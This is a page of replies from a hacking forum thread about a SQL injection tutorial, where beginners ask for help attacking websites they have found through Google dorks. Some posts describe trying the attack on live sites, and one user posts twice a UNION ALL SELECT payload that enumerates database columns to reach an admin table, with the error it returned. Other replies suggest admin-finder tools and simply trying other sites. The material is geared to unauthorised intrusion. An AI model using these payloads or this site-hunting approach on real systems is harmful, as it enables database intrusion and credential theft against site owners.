Sinisterly
My SQL injection complete tutorial :) - Printable Version

+- Sinisterly (https://sinister.ly)
+-- Forum: Hacking (https://sinister.ly/Forum-Hacking)
+--- Forum: Tutorials (https://sinister.ly/Forum-Tutorials)
+--- Thread: My SQL injection complete tutorial :) (/Thread-My-SQL-injection-complete-tutorial)

Pages: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39


RE: My SQL injection complete tutorial :) - V1P3R - 06-15-2011

@igor get an admin finder
@fourth element i am glad to help you Smile if you want to send the question by PM i got no problems replying it ^^
@watikiki i didn't understand your question...


RE: My SQL injection complete tutorial :) - wow22 - 06-16-2011

V1P3R i really cannot understand becoz i am a newbie hacker.Can u post a video ? That way i can understand >.<


RE: My SQL injection complete tutorial :) - Hatsune Miku_mybb_import5879 - 06-16-2011

Thank you good sir for this fine TUT.

I say isn't it a nice day for a cup of tea?


RE: My SQL injection complete tutorial :) - 5rudz - 06-19-2011

"First we need 2 find a site, start by opening google.
Now we type our dork: "defenition of dork" 'a search entry for a certain type of site/exploit .ect"
There is a large number of google dork for basic sql injection. "

I dont understand this... can you explain further?



RE: My SQL injection complete tutorial :) - deathknight - 06-20-2011

did i do something wrong to get to "FORBIDDEN" page when i type "url: union all select ....." line??
it seems the site is vulnerable.... and the username Admin and passwords also didnt work.
well... i will try on other sites too.
And, very detailed and excellent tutorialllll. thanks.


RE: My SQL injection complete tutorial :) - jona321 - 06-20-2011

Microsoft OLE DB Provider for SQL Server error '80040e14'

The char function requires 1 arguments.

/Programmes.asp, line 7

This error comes when
.asp?PID=-10 union all select 1,2,3,4,5,6,7,column_name,9,10,11,12,13,14,15,16 from information_schema.columns where table_name=char(65,100,109,105,110 )--

Help me Plz Sad
Microsoft SQL Server 2000 - 8.00.194 (Intel X86) Aug 6 2000 00:57:48 Copyright © 1988-2000 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)


database version here


RE: My SQL injection complete tutorial :) - mota - 06-22-2011

This tutorial is great!!! like this.... Biggrin


RE: My SQL injection complete tutorial :) - l0c41H0st - 06-22-2011

very Good tutorial for beginners.Congrats....Smile
give me password bro.


RE: My SQL injection complete tutorial :) - V1P3R - 06-22-2011

first off all thanks for the thanks xD
second:
@5rudz i am telling you what to do to find vulnerable sites
@deathknight that site forbids you from entering SQL links just try another
@jona you aren't entering admin table why do you need it?


RE: My SQL injection complete tutorial :) - jona321 - 06-23-2011

Microsoft OLE DB Provider for SQL Server error '80040e14'

The char function requires 1 arguments.

/Programmes.asp, line 7

This error comes when
.asp?PID=-10 union all select 1,2,3,4,5,6,7,column_name,9,10,11,12,13,14,15,16 from information_schema.columns where table_name=char(65,100,109,105,110 )--

Help me Plz Sad
Microsoft SQL Server 2000 - 8.00.194 (Intel X86) Aug 6 2000 00:57:48 Copyright © 1988-2000 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)


database version here